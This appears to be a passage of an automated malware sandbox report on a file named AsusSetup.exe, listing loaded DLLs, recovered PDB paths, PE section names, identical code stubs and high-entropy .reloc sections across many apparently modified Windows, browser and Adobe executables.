Source: C:\Windows\System32\alg.exe, Section loaded: winsta.dll
Source: C:\Windows\System32\alg.exe, Section loaded: ntlanman.dll
Source: C:\Windows\System32\alg.exe, Section loaded: davclnt.dll
Source: C:\Windows\System32\alg.exe, Section loaded: davhlpr.dll
Source: C:\Windows\System32\alg.exe, Section loaded: wkscli.dll
Source: C:\Windows\System32\alg.exe, Section loaded: cscapi.dll
Source: C:\Windows\System32\alg.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\alg.exe, Section loaded: browcli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe, Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe, Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
Source: AsusSetup.exe, Static PE information: Virtual size of .text is bigger than: 0x100000
Source: AsusSetup.exe, Static PE information: Image base 0x140000000 > 0x60000000
Source: AsusSetup.exe, Static file information: File size 5251072 > 1048576
Source: AsusSetup.exe, Static PE information: Raw size of .text is bigger than: 0x100000 < 0x203c00
Source: AsusSetup.exe, Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x18d000
Source: AsusSetup.exe, Static PE information: More than 200 imports for USER32.dll
Source: AsusSetup.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.2150436994.0000000003080000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2690809228.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2861757838.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, plugin-container.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2834736372.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: msdtcexe.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2419515500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2407189666.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: chrome_pwa_launcher.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: alg.exe, 00000003.00000003.2814896754.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: alg.exe, 00000003.00000003.2678114905.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: default-browser-agent.pdb source: alg.exe, 00000003.00000003.2739562117.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2917096647.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: alg.exe.0.dr Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: msdtc.exe.0.dr Static PE information: real checksum: 0x2f054 should be: 0x16b97b
Source: armsvc.exe.0.dr Static PE information: section name: .didat
Source: alg.exe.0.dr Static PE information: section name: .didat
Source: FXSSVC.exe.0.dr Static PE information: section name: .didat
Source: elevation_service.exe.0.dr Static PE information: section name: .00cfg
Source: elevation_service.exe.0.dr Static PE information: section name: .gxfg
Source: elevation_service.exe.0.dr Static PE information: section name: .retplne
Source: elevation_service.exe.0.dr Static PE information: section name: _RDATA
Source: elevation_service.exe.0.dr Static PE information: section name: malloc_h
Source: elevation_service.exe0.0.dr Static PE information: section name: .00cfg
Source: elevation_service.exe0.0.dr Static PE information: section name: .gxfg
Source: elevation_service.exe0.0.dr Static PE information: section name: .retplne
Source: elevation_service.exe0.0.dr Static PE information: section name: _RDATA
Source: elevation_service.exe0.0.dr Static PE information: section name: malloc_h
Source: maintenanceservice.exe.0.dr Static PE information: section name: .00cfg
Source: maintenanceservice.exe.0.dr Static PE information: section name: .voltbl
Source: maintenanceservice.exe.0.dr Static PE information: section name: _RDATA
Source: msdtc.exe.0.dr Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.3.dr Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.3.dr Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.3.dr Static PE information: section name: .gehcont
Source: unpack200.exe.3.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.3.dr Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.3.dr Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.3.dr Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.3.dr Static PE information: section name: .gehcont
Source: cookie_exporter.exe.3.dr Static PE information: section name: .00cfg
Source: cookie_exporter.exe.3.dr Static PE information: section name: .gxfg
Source: cookie_exporter.exe.3.dr Static PE information: section name: .retplne
Source: cookie_exporter.exe.3.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr Static PE information: section name: .00cfg
Source: identity_helper.exe.3.dr Static PE information: section name: .gxfg
Source: identity_helper.exe.3.dr Static PE information: section name: .retplne
Source: identity_helper.exe.3.dr Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr Static PE information: section name: malloc_h
Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: section name: .retplne
Source: Acrobat.exe.3.dr Static PE information: section name: .didat
Source: Acrobat.exe.3.dr Static PE information: section name: _RDATA
Source: AcroCEF.exe.3.dr Static PE information: section name: .didat
Source: AcroCEF.exe.3.dr Static PE information: section name: _RDATA
Source: setup.exe.3.dr Static PE information: section name: .00cfg
Source: setup.exe.3.dr Static PE information: section name: .gxfg
Source: setup.exe.3.dr Static PE information: section name: .retplne
Source: setup.exe.3.dr Static PE information: section name: LZMADEC
Source: setup.exe.3.dr Static PE information: section name: _RDATA
Source: setup.exe.3.dr Static PE information: section name: malloc_h
Source: msedgewebview2.exe.3.dr Static PE information: section name: .00cfg
Source: msedgewebview2.exe.3.dr Static PE information: section name: .gxfg
Source: msedgewebview2.exe.3.dr Static PE information: section name: .retplne
Source: msedgewebview2.exe.3.dr Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.3.dr Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.3.dr Static PE information: section name: _RDATA
Source: msedgewebview2.exe.3.dr Static PE information: section name: malloc_h
Source: msedge_proxy.exe.3.dr Static PE information: section name: .00cfg
Source: msedge_proxy.exe.3.dr Static PE information: section name: .gxfg
Source: msedge_proxy.exe.3.dr Static PE information: section name: .retplne
Source: msedge_proxy.exe.3.dr Static PE information: section name: _RDATA
Source: msedge_proxy.exe.3.dr Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.3.dr Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.3.dr Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.3.dr Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.3.dr Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.3.dr Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.3.dr Static PE information: section name: malloc_h
Source: notification_click_helper.exe.3.dr Static PE information: section name: .00cfg
Source: notification_click_helper.exe.3.dr Static PE information: section name: .gxfg
Source: notification_click_helper.exe.3.dr Static PE information: section name: .retplne
Source: notification_click_helper.exe.3.dr Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.3.dr Static PE information: section name: _RDATA
Source: notification_click_helper.exe.3.dr Static PE information: section name: malloc_h
Source: pwahelper.exe.3.dr Static PE information: section name: .00cfg
Source: pwahelper.exe.3.dr Static PE information: section name: .gxfg
Source: pwahelper.exe.3.dr Static PE information: section name: .retplne
Source: pwahelper.exe.3.dr Static PE information: section name: _RDATA
Source: pwahelper.exe.3.dr Static PE information: section name: malloc_h
Source: msedge_proxy.exe0.3.dr Static PE information: section name: .00cfg
Source: msedge_proxy.exe0.3.dr Static PE information: section name: .gxfg
Source: msedge_proxy.exe0.3.dr Static PE information: section name: .retplne
Source: msedge_proxy.exe0.3.dr Static PE information: section name: _RDATA
Source: msedge_proxy.exe0.3.dr Static PE information: section name: malloc_h
Source: pwahelper.exe0.3.dr Static PE information: section name: .00cfg
Source: pwahelper.exe0.3.dr Static PE information: section name: .gxfg
Source: pwahelper.exe0.3.dr Static PE information: section name: .retplne
Source: pwahelper.exe0.3.dr Static PE information: section name: _RDATA
Source: pwahelper.exe0.3.dr Static PE information: section name: malloc_h
Source: MicrosoftEdgeUpdate.exe.3.dr Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateBroker.exe.3.dr Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: section name: _RDATA
Source: AcroCEF.exe0.3.dr Static PE information: section name: .didat
Source: AcroCEF.exe0.3.dr Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.3.dr Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.3.dr Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateCore.exe.3.dr Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateOnDemand.exe.3.dr Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.3.dr Static PE information: section name: .didat
Source: AppVLP.exe.3.dr Static PE information: section name: .c2r
Source: OneDriveSetup.exe.3.dr Static PE information: section name: .didat
Source: AdobeCollabSync.exe.3.dr Static PE information: section name: .didat
Source: AdobeCollabSync.exe.3.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\AsusSetup.exe Code function: 0_2_01FD68CE push E9000001h; retn 0000h 0_2_01FD68D3
Source: C:\Users\user\Desktop\AsusSetup.exe Code function: 0_2_01FD52E3 push E9000001h; retf 0000h 0_2_01FD52E8
Source: C:\Windows\System32\AppVClient.exe Code function: 7_2_00BE68CE push E9000001h; retn 0000h 7_2_00BE68D3
Source: C:\Windows\System32\AppVClient.exe Code function: 7_2_00BE52E3 push E9000001h; retf 0000h 7_2_00BE52E8
Source: C:\Windows\System32\FXSSVC.exe Code function: 10_2_00D268CE push E9000001h; retn 0000h 10_2_00D268D3
Source: C:\Windows\System32\FXSSVC.exe Code function: 10_2_00D252E3 push E9000001h; retf 0000h 10_2_00D252E8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 11_2_009968CE push E9000001h; retn 0000h 11_2_009968D3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 11_2_009952E3 push E9000001h; retf 0000h 11_2_009952E8
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 12_2_00C068CE push E9000001h; retn 0000h 12_2_00C068D3
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 12_2_00C052E3 push E9000001h; retf 0000h 12_2_00C052E8
Source: AsusSetup.exe Static PE information: section name: .reloc entropy: 7.909171977386322
Source: AppVClient.exe.0.dr Static PE information: section name: .reloc entropy: 7.926383478449183
Source: FXSSVC.exe.0.dr Static PE information: section name: .reloc entropy: 7.932560428980175
Source: elevation_service.exe.0.dr Static PE information: section name: .reloc entropy: 7.934137158828998
Source: elevation_service.exe0.0.dr Static PE information: section name: .reloc entropy: 7.9362222500865025
Source: identity_helper.exe.3.dr Static PE information: section name: .reloc entropy: 7.9308459503172175
Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: section name: .reloc entropy: 7.924990615411256
Source: 7zFM.exe.3.dr Static PE information: section name: .reloc entropy: 7.922191769230744
Source: 7zG.exe.3.dr Static PE information: section name: .reloc entropy: 7.917678665265775
Source: Acrobat.exe.3.dr Static PE information: section name: .reloc entropy: 7.930139587851669
Source: AcroCEF.exe.3.dr Static PE information: section name: .reloc entropy: 7.9270575714190405
Source: setup.exe.3.dr Static PE information: section name: .reloc entropy: 7.9346434100610885
Source: msedgewebview2.exe.3.dr Static PE information: section name: .reloc entropy: 7.926357085974897
Source: msedge_proxy.exe.3.dr Static PE information: section name: .reloc entropy: 7.932385336292712
Source: msedge_pwa_launcher.exe.3.dr Static PE information: section name: .reloc entropy: 7.936513051347911
Source: notification_click_helper.exe.3.dr Static PE information: section name: .reloc entropy: 7.934183706757763
Source: pwahelper.exe.3.dr Static PE information: section name: .reloc entropy: 7.931002327709391
Source: msedge_proxy.exe0.3.dr Static PE information: section name: .reloc entropy: 7.932383792959081
Source: pwahelper.exe0.3.dr Static PE information: section name: .reloc entropy: 7.931007666328552
Source: SingleClientServicesUpdater.exe.3.dr Static PE information: section name: .reloc entropy: 7.934069883170879
Source: AcroCEF.exe0.3.dr Static PE information: section name: .reloc entropy: 7.927076679261827
Source: SingleClientServicesUpdater.exe0.3.dr Static PE information: section name: .reloc entropy: 7.9340774103989355
Source: MicrosoftEdgeUpdateSetup.exe.3.dr Static PE information: section name: .reloc entropy: 7.930281169019227
Source: OneDriveSetup.exe.3.dr Static PE information: section name: .reloc entropy: 7.862432729550158
Source: ADNotificationManager.exe.3.dr Static PE information: section name: .reloc entropy: 7.927081705557461
